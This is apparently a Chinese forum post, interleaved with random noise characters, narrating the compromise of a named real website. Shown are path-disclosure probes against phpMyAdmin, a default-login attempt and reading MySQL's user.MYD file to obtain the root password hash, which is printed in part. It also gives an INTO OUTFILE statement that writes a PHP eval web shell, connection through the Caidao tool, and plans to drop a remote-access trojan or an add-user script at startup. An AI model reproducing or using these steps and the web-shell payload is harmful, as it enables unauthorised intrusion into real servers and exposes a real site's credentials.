3、magic_quotes_gpc()=OFF
7 Z# C }+ f+ h7 T: r: Z9 f0 A _/ n7 ~; A, Q+ r3 q
试着爆绝对路径:
& O; Y9 z% ~$ v. D6 x3 n+ Q$ G
1./phpMyAdmin/index.php?lang[]=1
/ u' o+ m0 { Z. s2 x: r! G: U2./phpMyAdmin/phpinfo.php
; a- v* ]* W% J# E1 B7 B$ ^
3./load_file()
7 a# S& l- B+ C/ I/ J; b- q2 m$ i
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
7 r% ?4 K! S+ ~) j' S' e5./phpmyadmin/libraries/select_lang.lib.php
' j3 q( m1 j% X; J" b; p+ o& H& q
6./phpmyadmin/libraries/lect_lang.lib.php
- x' n5 L6 p; Q/ _' P9 q5 F4 I7./phpmyadmin/libraries/mcrypt.lib.php
5 K4 R+ q$ Z) y3 H- h# t8./phpmyadmin/libraries/export/xls.php
# n2 L4 ^4 Q& G0 i x. `2 B- p; o* N# s, g; Q1 X) U
均不行...........................
8 r4 h' F/ K/ @' |
+ l+ s/ }% A* ^4 H御剑扫到这个:
http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
" z. E8 @2 G/ ]7 S% w: K' J" c- m) ^1 k5 F
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
2 }$ M: Q* D! P) w3 f' C2 ?. V4 K
7 o' S5 R" o+ l7 a$ {$ h- z: x
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
; ^* X6 G8 N! d5 {8 V, S. w
) J( f. b/ S- z0 S9 c. W5 x敏感东西:
http://202.103.49.66/Admincp.php 社工进不去...........
- E+ k* K; n3 O3 I& y( V
9 k0 `2 f* e1 L# p* ~0 P+ X想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
4 T3 C* L1 g7 f( L. c* e' f
1 u9 h: c/ d+ [) Whttp://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
6 T$ u4 B3 _0 V; q
" `) @1 `: }# }- L- J G3 N3 _自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
4 K" E& ~; x$ o) ~/ g2 h6 L
0 A% R$ |( q4 l- z: y, K成功读到root密码:
: G. P% e8 M! V2 m
: J+ q# X. b7 |17---- r(0072)
) N( K2 g& H" N. m% ^, `18---- o(006f)
9 {9 }1 h+ x; y; }# V
19---- o(006f)
( @8 K* B: ?1 O8 G2 i3 F! t20---- t(0074)
; } W4 W1 O6 ~21---- *(002a)
5 {$ Y: S! L' Z' z* X: Y8 _+ E, q+ x
22---- 8(0038)
; |1 Q4 f. y4 v3 W. \6 t23---- 2(0032)
/ N0 y/ n' B6 ^4 R/ {+ e24---- E(0045)
p# F9 G/ ?6 U25---- 1(0031)
$ F+ G8 o# ~! K: e; T8 P i26---- C(0043)
5 |' i, j$ ]: \9 y27---- 5(0035)
4 W$ y4 C7 l6 W5 x; c4 D
28---- 8(0038)
7 F: o. u9 _% k& O
29---- 2(0032)
/ A* n" N/ A2 C O' `4 r& R% O30---- 8(0038)
1 Z# u7 W9 c( w( v# c0 T S% J
31---- A(0041)
4 R: O. j& ^- H' ?32---- 9(0039)
* X$ F- U! y; P u0 T3 v7 b33---- B(0042)
; d0 I! Q7 H7 z' d! y- o34---- 5(0035)
. R% {1 O" J. I( T, W; v35---- 4(0034)
% \* w) T0 B- A& o/ F6 x36---- 8(0038)
0 u; \4 T. C7 O3 p8 z+ j% _. F- e" Z: e0 Q37---- 6(0036)
6 V# \) m$ |- s1 P8 M( D: D
38---- 4(0034)
7 k! M3 y, p1 L- U n' n E# ]39---- 9(0039)
* F4 g( B2 S, j8 R7 ~40---- 1(0031)
! \ ]+ [* N! j41---- 1(0031)
- g0 ? R7 _3 B0 r0 D
42---- 5(0035)
" }( ^; S `& h& o% n
43---- 3(0033)
9 b; g) O4 o& M+ q2 D& Q# s! `44---- 5(0035)
* l K& Y0 @! |( e) K45---- 9(0039)
+ \! b/ \9 O/ i( j- |( N U' x4 J
46---- 8(0038)
2 C9 L0 s7 @7 K5 y/ z! P# U
47---- F(0046)
6 `2 ^; h4 i* n# ^' R1 V: W
48---- F(0046)
6 K( _ |0 L: s6 l; }9 @7 c( x49---- 4(0034)
, ~! W$ {. r: ?# Y
50---- F(0046)
1 y( T$ x) U$ l& b2 Z- J/ U51---- 0(0030)
9 q4 g- \( K- t4 D- S3 l52---- 3(0033)
% j; N* U$ O% W7 q53---- 2(0032)
) ]% H4 }4 a$ f1 ], |4 Y
54---- A(0041)
4 C- `% D9 r: s55---- 4(0034)
; |8 Q5 ?. `2 S+ D& i; b7 @- p
56---- A(0041)
" y& z! R* X+ {" B/ w6 l57---- B(0042)
+ a4 R$ s( V% ]7 N5 H% T) t! e' k" y
58---- *(0044)
6 ^3 {1 M8 P0 A) \59---- *(0035)
" S2 d/ F$ ~, |4 Q# o! u60---- *(0041)
! k! f$ m8 x0 i. s: u* _/ f61---- *0032)
0 B# x! {6 x# {. ~+ T2 A! C$ x
+ n2 G0 r7 A! H解密后成功登陆phpmyamin
+ X+ D8 ^/ ~+ x9 w. [ `; k7 f ! x. @. L3 P( [& T Y1 _
% _, k1 f9 E2 ]' A) s* X
[attach]164[/attach]
+ Y% C( m! Y, n) n, E
. ?8 N. c; ?) u3 `找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
7 `2 _2 M* \" d0 M. M$ \# ]
' X4 n% `: H" c; x, j成功执行,拿下shell,菜刀连接:
7 @. B; K! q, S$ O: \6 {( m$ g- v% R% V( P$ U
服务器不支持asp,aspx,php提权无果...................
# k6 o( A, ^) x( f) j& ~
" K# h' m5 p6 M/ P% U7 X# [8 [; O但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
! K# n# }' U5 n( a: m/ W/ g